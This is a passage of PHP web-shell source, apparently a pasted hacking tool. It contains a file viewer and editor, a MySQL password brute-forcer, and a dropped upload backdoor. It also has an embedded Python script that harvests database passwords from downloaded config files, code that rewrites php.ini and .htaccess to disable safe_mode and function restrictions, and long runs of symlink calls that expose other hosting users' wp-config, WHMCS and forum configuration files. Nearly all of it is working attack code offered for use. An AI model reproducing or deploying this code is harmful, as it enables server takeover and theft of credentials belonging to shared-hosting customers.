  1901.     "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
  1902. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  1903. <table class="cmdbox">
  1904. <tr><td colspan="2">
  1905. <textarea class="output" name="content">
  1906. <?php echo $content; ?>
  1907. </textarea>
  1908. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  1909. &nbsp;<?php echo $msg; ?></td></tr>
  1910. </table>
  1911. </form>
  1912. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')) { ?>
  1913. <form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">
  1914.  
  1915. <?php  unset($_SESSION[md5($_SERVER['hxxp_HOST'])]); echo 'bye!'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
  1916.                 <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  1917.             <?php  ?>
  1918. <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
  1919. <?php  @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Gca~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=green>$ok</font> Cpanel</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['hxxp_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "<?php
  1920. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1921. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1922. if( $_POST['_upl'] == "Upload" ) {
  1923. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }
  1924. else { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }
  1925. }
  1926. ?>"; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = '#!/usr/bin/env python
  1927.  
  1928. '''
  1929. By: Ahmed Shawky aka lnxg33k
  1930. thx: Obzy, Relik, mohab and #arabpwn
  1931. '''
  1932.  
  1933. import sys
  1934. import os
  1935. import re
  1936. import subprocess
  1937. import urllib
  1938. import glob
  1939. from platform import system
  1940.  
  1941. if len(sys.argv) != 3:
  1942.   print''' 
  1943.  Usage: %s [URL...] [directory...]
  1944.  Ex) %s hxxp://www.test.com/test/ [dir ...]''' % (sys.argv[0], sys.argv[0])
  1945.   sys.exit(1)
  1946.  
  1947. site = sys.argv[1]
  1948. fout = sys.argv[2]
  1949.  
  1950. try:
  1951.   req  = urllib.urlopen(site)
  1952.   read = req.read()
  1953.   if system() == 'Linux':
  1954.     f = open('/tmp/data.txt', 'w')
  1955.     f.write(read)
  1956.     f.close()
  1957.   if system() == 'Windows':
  1958.     f = open('data.txt', 'w')  
  1959.     f.write(read)
  1960.     f.close()
  1961.  
  1962.   i = 0
  1963.   if system() == 'Linux':
  1964.     f = open('/tmp/data.txt', 'rU')
  1965.     for line in f:
  1966.       if line.startswith('<li><a') == True :
  1967.         m = re.search(r'(<a href=")(.+[^>])(">)', line)
  1968.         i += 1
  1969.         local_name = '%s/file%d.txt' % (fout, i)
  1970.         print 'Retrieving...\t\t', site + m.group(2)
  1971.         try:  urllib.urlretrieve(site + m.group(2), local_name)
  1972.         except IOError:
  1973.           print '\n[%s] doesn\'t exist, create it first' % fout
  1974.           sys.exit()
  1975.       if line.startswith('<img') == True:
  1976.         m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
  1977.         i += 1
  1978.         local_name = '%s/file%d.txt' % (fout, i)
  1979.         print 'Retrieving...\t\t', site + m1.group(2)
  1980.         try:  urllib.urlretrieve(site + m1.group(2), local_name)
  1981.         except IOError:
  1982.           print '\n[%s] doesn\'t exist, create it first' % fout
  1983.           sys.exit()
  1984.       if line.startswith('<IMG') == True:
  1985.         m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
  1986.         i += 1
  1987.         local_name = '%s/file%d.txt' % (fout, i)
  1988.         print 'Retrieving...\t\t', site + m2.group(2)
  1989.         try:  urllib.urlretrieve(site + m2.group(2), local_name)
  1990.         except IOError:
  1991.           print '\n[%s] doesn\'t exist, create it first' % fout
  1992.           sys.exit()
  1993.     f.close()
  1994.   if system() == 'Windows':
  1995.     f = open('data.txt', 'rU')
  1996.     for line in f:
  1997.       if line.startswith('<li><a') == True :
  1998.         m = re.search(r'(<a href=")(.+[^>])(">)', line)
  1999.         i += 1
  2000.         local_name = '%s/file%d.txt' % (fout, i)
  2001.         print 'Retrieving...\t\t', site + m.group(2)
  2002.         try:  urllib.urlretrieve(site + m.group(2), local_name)
  2003.         except IOError:
  2004.           print '\n[%s] doesn\'t exist, create it first' % fout
  2005.           sys.exit()
  2006.       if line.startswith('<img') == True:
  2007.         m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
  2008.         i += 1
  2009.         local_name = '%s/file%d.txt' % (fout, i)
  2010.         print 'Retrieving...\t\t', site + m1.group(2)
  2011.         try:  urllib.urlretrieve(site + m1.group(2), local_name)
  2012.         except IOError:
  2013.           print '\n[%s] doesn\'t exist, create it first' % fout
  2014.           sys.exit()
  2015.       if line.startswith('<IMG') == True:
  2016.         m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
  2017.         i += 1
  2018.         local_name = '%s/file%d.txt' % (fout, i)
  2019.         print 'Retrieving...\t\t', site + m2.group(2)
  2020.         try:  urllib.urlretrieve(site + m2.group(2), local_name)
  2021.         except IOError:
  2022.           print '\n[%s] doesn\'t exist, create it first' % fout
  2023.           sys.exit()
  2024.     f.close()
  2025.   if system() == 'Linux':
  2026.     cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
  2027.   if system() == 'Windows':
  2028.     cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
  2029.   print '\n', '-' * 100, '\n'
  2030.   if system() == 'Linux':
  2031.     for root, dirs, files in os.walk(fout):
  2032.       for fname in files:
  2033.         fullpath = os.path.join(root, fname)
  2034.         f = open(fullpath, 'r')
  2035.         for line in f:
  2036.           secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
  2037.           if secr is not None: print (secr.group(2))  
  2038.           secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
  2039.           if secr1 is not None:  print  (secr1.group(2))
  2040.           secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
  2041.           if secr2 is not None: print (secr2.group(3))
  2042.           secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
  2043.           if secr3 is not None: print (secr3.group(2))
  2044.           secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
  2045.           if secr4 is not None: print (secr4.group(2))
  2046.           secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
  2047.           if secr5 is not None: print (secr5.group(2))
  2048.           secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
  2049.           if secr6 is not None: print (secr6.group(2))
  2050.           secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
  2051.           if secr7 is not None: print (secr7.group(2))
  2052.         f.close()
  2053.   if system() == 'Windows':
  2054.     for infile in glob.glob( os.path.join(fout, '*.txt') ):
  2055.       f = open(infile, 'r')
  2056.       for line in f:
  2057.         secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
  2058.         if secr is not None: print (secr.group(2))  
  2059.         secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
  2060.         if secr1 is not None:  print  (secr1.group(2))
  2061.         secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
  2062.         if secr2 is not None: print (secr2.group(3))
  2063.         secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
  2064.         if secr3 is not None: print (secr3.group(2))
  2065.         secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
  2066.         if secr4 is not None: print (secr4.group(2))
  2067.         secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
  2068.         if secr5 is not None: print (secr5.group(2))
  2069.         secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
  2070.         if secr6 is not None: print (secr6.group(2))
  2071.         secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
  2072.         if secr7 is not None: print (secr7.group(2))
  2073.       f.close()
  2074. except (KeyboardInterrupt):
  2075.   print '\nThanks for using it ._^''; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
  2076. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
  2077. </center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "<hr><center><b>DONE!"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); 
symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); 
symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); 
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); 
symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); 
symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); 
symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); 
symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); 
symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); 
